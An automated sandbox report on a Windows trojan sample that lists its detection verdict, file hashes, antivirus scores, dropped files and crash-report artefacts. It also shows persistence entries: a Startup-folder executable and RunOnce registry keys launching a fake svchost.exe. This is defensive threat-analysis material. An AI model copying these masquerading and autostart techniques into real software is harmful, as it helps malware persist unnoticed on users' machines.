                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                  Report type:full
                                                                                                  Sample file name:lKJbVguaav (renamed file extension from none to exe)
                                                                                                  Cookbook file name:default.jbs
                                                                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                  Number of analysed new started processes analysed:93
                                                                                                  Number of new started drivers analysed:0
                                                                                                  Number of existing processes analysed:0
                                                                                                  Number of existing drivers analysed:0
                                                                                                  Number of injected processes analysed:0
                                                                                                  Technologies:
                                                                                                  • HCA enabled
                                                                                                  • EGA enabled
                                                                                                  • HDC enabled
                                                                                                  • AMSI enabled
                                                                                                  Analysis Mode:default
                                                                                                  Analysis stop reason:Timeout
                                                                                                  Detection:MAL
                                                                                                  Classification:mal100.troj.adwa.expl.evad.winEXE@128/79@5/2
                                                                                                  EGA Information:Failed
                                                                                                  HDC Information:
                                                                                                  • Successful, ratio: 100% (good quality ratio 95.8%)
                                                                                                  • Quality average: 83%
                                                                                                  • Quality standard deviation: 25.9%
                                                                                                  HCA Information:
                                                                                                  • Successful, ratio: 66%
                                                                                                  • Number of executed functions: 42
                                                                                                  • Number of non-executed functions: 170
                                                                                                  Cookbook Comments:
                                                                                                  • Adjust boot time
                                                                                                  • Enable AMSI
                                                                                                  Warnings:
                                                                                                  Show All
                                                                                                  • Connection to analysis system has been lost, crash info: Normal
                                                                                                  • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, WmiPrvSE.exe
                                                                                                  • Excluded IPs from analysis (whitelisted): 131.253.33.200, 13.107.22.200, 104.208.16.94, 20.189.173.21, 20.189.173.22, 2.20.86.117, 20.42.65.92, 23.35.236.56, 13.107.5.88, 13.107.42.23, 52.182.143.212, 20.82.210.154
                                                                                                  • Excluded domains from analysis (whitelisted): client-office365-tas.msedge.net, ocos-office365-s2s.msedge.net, config.edge.skype.com.trafficmanager.net, onedsblobprdwus17.westus.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, e-0009.e-msedge.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, config-edge-skype.l-0014.l-msedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, l-0014.config.skype.com, arc.msn.com, e12564.dspb.akamaiedge.net, onedsblobprdcus15.centralus.cloudapp.azure.com, login.live.com, www-bing-com.dual-a-0001.a-msedge.net, onedsblobprdwus16.westus.cloudapp.azure.com, arc.trafficmanager.net, watson.telemetry.microsoft.com, prod.fs.microsoft.com.akadns.net, config.edge.skype.com, onedsblobprdcus16.centralus.cloudapp.azure.com, www.bing.com, fs.microsoft.com, afdo-tas-offload.trafficmanager.net, e1723.g.akamaiedge.net, settings-win.data.microsoft.com, dual-a-0001.dc-msedge.net, ocos-office365-s2s-msedge-net.e-0009.e-msedge.net, onedsblobprdeus17.eastus.cloudapp.azure.com, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, l-0014.l-msedge.net
                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                  • Report size getting too big, too many NtSetInformationFile calls found.

                                                                                                  Simulations

                                                                                                  Behavior and APIs

                                                                                                  TimeTypeDescription
                                                                                                  16:11:21API Interceptor2x Sleep call for process: svchost.exe modified
                                                                                                  16:11:43AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exe
                                                                                                  16:11:45API Interceptor225x Sleep call for process: powershell.exe modified
                                                                                                  16:11:59AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce 7ADA33B7 C:\Program Files\Common Files\System\E59A6148\svchost.exe
                                                                                                  16:12:08AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce 7ADA33B7 C:\Program Files\Common Files\System\E59A6148\svchost.exe

                                                                                                  Joe Sandbox View / Context

                                                                                                  IPs

                                                                                                  No context

                                                                                                  Domains

                                                                                                  No context

                                                                                                  ASN

                                                                                                  No context

                                                                                                  JA3 Fingerprints

                                                                                                  No context

                                                                                                  Dropped Files

                                                                                                  No context

                                                                                                  Created / dropped Files

                                                                                                  C:\Program Files\Common Files\system\E59A6148\svchost.exe
                                                                                                  Process:C:\Users\user\Desktop\lKJbVguaav.exe
                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):856022
                                                                                                  Entropy (8bit):5.80731766715221
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12288:rn8yLq+IYhqreG7zHRwpS/hCcpzfRJYL4wFcTEDCN:rn3L1IYh+Zdl/dpz4swFPDCN
                                                                                                  MD5:5F377DE371A8E95ACEC9956303D6F032
                                                                                                  SHA1:4D36D918DF8FF90C0327EF713CFA262591D93636
                                                                                                  SHA-256:46EEDA891D1AB66CB14C007A901CF167B9E80ED78D9AF21889EEA4BE3EB55E09
                                                                                                  SHA-512:F7766DBB768CD671AC7A2E99B78625352B2BA53504CE9BAAF6545AFB0D33D769218B117400BB1658A48B1B6A108F56CF29B2287C761C9C98F7D6F714D6C4B506
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                  • Antivirus: Virustotal, Detection: 62%, Browse
                                                                                                  • Antivirus: Metadefender, Detection: 34%, Browse
                                                                                                  • Antivirus: ReversingLabs, Detection: 67%
                                                                                                  Reputation:unknown
                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....q...............0.................. ... ....@.. .......................`............`.....................................J.... ..D....................@..........8............................................ ............... ..H............text........ ...................... ..`.rsrc...D.... ......................@..@.reloc.......@......................@..@........................H........T..$...............&...<........................................*:.(......}....*:.{......o....*R.......}......}....*6.{..........*:.{...........*..{....*"..}....*:..(..........*~..(....2....X( ....{..........**.{.......*R.{.....{.....Y.....**.{.......*b..1..{.......s)...(...+*..{....,..{......{.....s)...(...+*..{....*2.q....s....*&...(/...*..{6...*"..}6...*..(7...*..*..{4.....{3....._c...{2..._.....*..{4.....{3....._c...{2..._......*Z.{4.....{3....._c....*v...{2..._T
                                                                                                  C:\Program Files\Common Files\system\E59A6148\svchost.exe:Zone.Identifier
                                                                                                  Process:C:\Users\user\Desktop\lKJbVguaav.exe
                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                  Category:modified
                                                                                                  Size (bytes):26
                                                                                                  Entropy (8bit):3.95006375643621
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:ggPYV:rPYV
                                                                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                  Malicious:true
                                                                                                  Reputation:unknown
                                                                                                  Preview: [ZoneTransfer]....ZoneId=0
                                                                                                  C:\ProgramData\Microsoft\Network\Downloader\edb.log
                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):4096
                                                                                                  Entropy (8bit):0.5971519204683815
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:6:bj5o0k1GaD0JOCEfMuaaD0JOCEfMKQmDVoitAl/gz2cE0fMbhEZolrRSQ2hyYIIT:bFo7GaD0JcaaD0JwQQVoitAg/0bjSQJ
                                                                                                  MD5:AB64B99C0F06769020BD113C0EB5FB74
                                                                                                  SHA1:41BEDACD29B42F66248AC424C0B50327DBB527F0
                                                                                                  SHA-256:A91438A87E080154B01FAE2C3A7B18FB09AD7256F5C4D976DC0985E51465C822
                                                                                                  SHA-512:9A1B8BD1C63BA9279E88792D447F3635A91B637E2C00F5DD7D51F71378AAD9686468FAA2B0332A41BBEB1D4A2D4DD259850FBB79B9992CEE13DCE3414796B1F0
                                                                                                  Malicious:false
                                                                                                  Reputation:unknown
                                                                                                  Preview: ....E..h..(..........y............... ..1C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@........................y............&......e.f.3...w.......................3...w..................h..C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b...G............................................................................................................................................................................................................
                                                                                                  C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                  File Type:Extensible storage engine DataBase, version 0x620, checksum 0x9d0904e9, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                  Category:dropped
                                                                                                  Size (bytes):32768
                                                                                                  Entropy (8bit):0.09686807036149726
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12:r0+FHlsO4blNfusKp0+FHlsO4blNfusK:go8jo8
                                                                                                  MD5:F7FBEDDD34C93534A1BF40170BA8BDDF
                                                                                                  SHA1:9DCF73909B86D76AB1CECA39DAA75C1B415E0CF9
                                                                                                  SHA-256:B97031F76D5E0E50765E17D7D60BBA94AB28277D3F5E2A9985FE9C7080FCCC06
                                                                                                  SHA-512:0B354BD3842FE33EDC8AC913EBFF2AD4CD35067CBC43E090B6D83FDE0AC889193F6E116132B22C9DEF7D06AB5DD6C7417A040CE4077DF9CEE4A63507E6627EF9
                                                                                                  Malicious:false
                                                                                                  Reputation:unknown
                                                                                                  Preview: ....... ................e.f.3...w........................&..........w.......y..h.(..............................3...w...........................................................................................................B...........@...................................................................................................... ........3...w.......................................................................................................................................................................................................................................|.$.....y..................P.Q......y..........................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                  C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):8192
                                                                                                  Entropy (8bit):0.11227145912104357
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:V/9EvwIsBAJl/bJdAtii/bu/tall:VAwRBAJt4t/buQ
                                                                                                  MD5:0C7BE372E73EBCC8ABA729C3D75E6D66
                                                                                                  SHA1:C9B9A6A0D0D3E731A666AC6CDBEC6F9B3F804F4E
                                                                                                  SHA-256:62E706225BDE2D12532296021A1A7187794BD5C034757813233195AB9895CD3A
                                                                                                  SHA-512:1543638675D823DCD197012B6A7053C66D88A1A524FA0F28D256F2BB692FFA96752F1CCF8A700EC0C84F12C31F1AE9A789B02D60526CB35CA7D05F78AF063C4B
                                                                                                  Malicious:false
                                                                                                  Reputation:unknown
                                                                                                  Preview: v.'J.....................................3...w.......y.......w...............w.......w....:O.....w..................P.Q......y..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                  C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_lKJbVguaav.exe_2d31aef62bf69c86310ee4e4d6bcfe8179b846_f2aaf5a9_0d501a6f\Report.wer
                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                  File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):15908
                                                                                                  Entropy (8bit):3.757893394768763
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:GGB1bG/rHBUZMXyaK3FcWqSgv/u7sDKwS274ItAEa:31bGjBUZMXyaAGv/u7sDPX4ItAEa
                                                                                                  MD5:5E70B4506529515AE11F5E1574B2B111
                                                                                                  SHA1:F6A25F3AAEBF70B0BA0E4927A18BFF37A4AFB31D
                                                                                                  SHA-256:C27686029A2BF9354BB50E0335F9A0AA0D1DAB2D171ED9C92AEBF2DE13BBF1CD
                                                                                                  SHA-512:2C2928D02796932D59EDA6B1139428B96A155545E32A8A4960B0F9BC13DA86E70A10C1154E341FB6DDFE1681CC43E69CC6B3F77D8CDE3683F8F6F537F63CE4F5
                                                                                                  Malicious:true
                                                                                                  Reputation:unknown
                                                                                                  Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.2.7.6.2.2.1.1.4.1.1.5.4.7.7.4.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.7.6.2.2.1.1.4.9.5.6.1.0.0.3.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.2.6.e.6.7.5.3.-.7.6.8.e.-.4.3.d.8.-.a.4.0.3.-.7.3.0.c.b.0.3.3.7.a.6.5.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.3.1.9.e.2.b.c.-.c.2.3.5.-.4.b.8.f.-.9.2.d.6.-.0.4.5.5.0.e.7.d.2.4.b.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.l.K.J.b.V.g.u.a.a.v...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.M.i.c.r.o.s.o.f.t...D.i.a.g.n.o.s.t.i.c.s...F.a.s.t.S.e.r.i.a.l.i.z.a.t.i.o.n...d.l.l.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.8.f.c.-.0.0.0.1.-.0.0.1.6.-.3.9.c.3.-.f.8.f.9.8.6.a.a.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.d.3.1.7.c.0.8.3.2.0.a.a.b.6.2.2.c.0.4.3.9.2.e.9.f.8.6.4.4.4.7.c.0.0.0.0.0.0.0.0.!.0.0.0.0.4.d.3.6.d.
                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER13AA.tmp.txt
                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):13340
                                                                                                  Entropy (8bit):2.695713832763062
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:9GiZYWSvE1mFYDYYWcHlyQYEZQHtFi1jBPpwyDOnaPsRQF1YyVMIAQ3:9jZDSbEtemIaPsRQ/Y6AQ3
                                                                                                  MD5:A60B0F4AE534AB4E8A386AFF185A9B54
                                                                                                  SHA1:D78BD6222567188BFDE1A5995CF396280B6D8C84
                                                                                                  SHA-256:4E8D16F52CD6F51B9AC9D78CD0879430D07E3652E748B1962A87BCD841897A95
                                                                                                  SHA-512:70AB47A193348EA3FEDC377C4A573136F8D0C4D2BB328F3821107AAF016151D940D2161269CABE27F9E8FB2A79D2B5FD38711D4B61219ACF3686943CB1AA000D
                                                                                                  Malicious:false
                                                                                                  Reputation:unknown
                                                                                                  Preview: B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.1.5.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERF3FB.tmp.dmp
                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                  File Type:Mini DuMP crash report, 14 streams, CheckSum 0x00000004, Wed Sep 15 23:12:22 2021, 0x1205a4 type
                                                                                                  Category:dropped
                                                                                                  Size (bytes):186195
                                                                                                  Entropy (8bit):4.802220764842539
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3072:Sg90wNUCgUJVcov5d6lM05jjd+p6n3V1hgCVD9gIOgF59:dXNTj/coz6C0Sp6nJ9RpD9
                                                                                                  MD5:F5AFA4B4CF5D6EE24294099A7F63BA29
                                                                                                  SHA1:D63F9F43804DC90A0F1DF73F8EF4571D358FC930
                                                                                                  SHA-256:24AA81C758B961711D89B5ACE652161342468D63D426D7675BBBFCA3EBB84F2C
                                                                                                  SHA-512:15CD5D45C330005A8EEEE32C794B52211199562CF80C51F124556775F31F0D34FC419E6F74C3839DD556C50C58774E8527A3CA93D4BEA12D752FB8219D242A08
                                                                                                  Malicious:false
                                                                                                  Reputation:unknown
                                                                                                  Preview: MDMP....... ........}Ba...................U...........B.......*......GenuineIntelW...........T............}Ba.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERFCC6.tmp.WERInternalMetadata.xml
                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                  File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):8416
                                                                                                  Entropy (8bit):3.6947819527452785
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:Rrl7r3GLNi4g6/6YIJSUDShMLcsgmfZaSeCprf89bFfsfCC3m:RrlsNin6/6YmSUD6MLngmfgS2FEfM
                                                                                                  MD5:8423F1EFD2F241F1DDA4A954051DB1F2
                                                                                                  SHA1:53DA66BD7852E9959825CFB5FA50E50B20DF24CD
                                                                                                  SHA-256:9CA3A037CB24F2805FBA4BD2A685BDC3F02FCDB7EC2452D923292942A1AC1C40
                                                                                                  SHA-512:25C5F6AB75F4ECFF483A2B78EBF2EE8372D6D68FAB150838E337E42E75EC46118E37FE8EC18A4586D87DEA952FEF5D5B220300ED3AFD3D6BF3B27AA3AE4A09B2
                                                                                                  Malicious:false
                                                                                                  Reputation:unknown
                                                                                                  Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.3.9.6.<./.P.i.d.>.......
                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERFE8C.tmp.xml
                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):4778
                                                                                                  Entropy (8bit):4.478992985631051
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:cvIwSD8zsOJgtWI9KLWfWSC8BE8fm8M4Jw1FX+q8vnnMI6b0Ld:uITfE3DSNTJ2KMhb0Ld
                                                                                                  MD5:2782D14AC423C162717070339F5C714E
                                                                                                  SHA1:C6DFF0A85EE5D23D9C9F3494B4B41A71F3D6D585
                                                                                                  SHA-256:5F478E1724B58F038CA40FA90E3A0BA8E7FB7008FCF701FC72701AA29BFB85B5
                                                                                                  SHA-512:95271D0051F927BBEB1A278E0A742361AEBD925C964FB41DE1FA749C1B4BBD468B8BBCAFD0E0B1864EE09E48FF16B7560AC69CEC23FF41C3DD9594BCC46308EB
                                                                                                  Malicious:false
                                                                                                  Reputation:unknown
                                                                                                  Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1168343" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERFEC9.tmp.csv
                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):55200
                                                                                                  Entropy (8bit):3.056419150685184
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:AUHb5F5722hEzy0VudVZ6CfKR5Zg/MDwSSylMYLPKut:AUHb5F5722hEzy0VudVZ6Cfa5Zg/MDwk
                                                                                                  MD5:FE6A0D6EDCE927970B8C80D2AFCE0ADB
                                                                                                  SHA1:38AEF1D63F6FF5BD20998FFEA6DD911218695190
                                                                                                  SHA-256:A283B560F84271F8CF075F420210CD2CEA0B0E0D0F1C21B8D08268D34F6C26DC
                                                                                                  SHA-512:F9014E7F8D46F49215ABE985D0A189D17EDCAC5579A98B05CB7BFE31FA76F30DD0263CD17F797F0A79A0C319AC45A9FD5A2C3F3A75B892DC919BBA849C318229
                                                                                                  Malicious:false
                                                                                                  Reputation:unknown
                                                                                                  Preview: I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):14734
                                                                                                  Entropy (8bit):4.993014478972177
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:cBVoGIpN6KQkj2Wkjh4iUxtaKdROdBLNXp5nYoGib4J:cBV3IpNBQkj2Lh4iUxtaKdROdBLNZBYH
                                                                                                  MD5:8D5E194411E038C060288366D6766D3D
                                                                                                  SHA1:DC1A8229ED0B909042065EA69253E86E86D71C88
                                                                                                  SHA-256:44EEE632DEDFB83A545D8C382887DF3EE7EF551F73DD55FEDCDD8C93D390E31F
                                                                                                  SHA-512:21378D13D42FBFA573DE91C1D4282B03E0AA1317B0C37598110DC53900C6321DB2B9DF27B2816D6EE3B3187E54BF066A96DB9EC1FF47FF86FEA36282AB906367
                                                                                                  Malicious:false
                                                                                                  Reputation:unknown
                                                                                                  Preview: PSMODULECACHE......<.e...Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........<.e...T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):19876
                                                                                                  Entropy (8bit):5.577969381559167
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:4t9Zk0Q0VYH/20phYv3IS0nEjultICspE9Eu16zC5ma8xJU9FR3:t5+0hTTEClt4xCUlk
                                                                                                  MD5:8A273213B9A9DF4E9E22C49CED787E2E
                                                                                                  SHA1:58BA984BBB1CC374E5F6505F38D6FB6F41CBE922
                                                                                                  SHA-256:17D5F6FED4E4F01F7B61F9B50740F03B1175346C37A7654C78238B37B21ED41E
                                                                                                  SHA-512:48A6FA6D4104995B987837726CA6B9E1A091BEF5560FB0A8D69BAFF1A5AFA8058AA6AC9987AB45A8C91C1510A3F204B96078E1B29942262DED8DE483595EA479
                                                                                                  Malicious:false
                                                                                                  Reputation:unknown
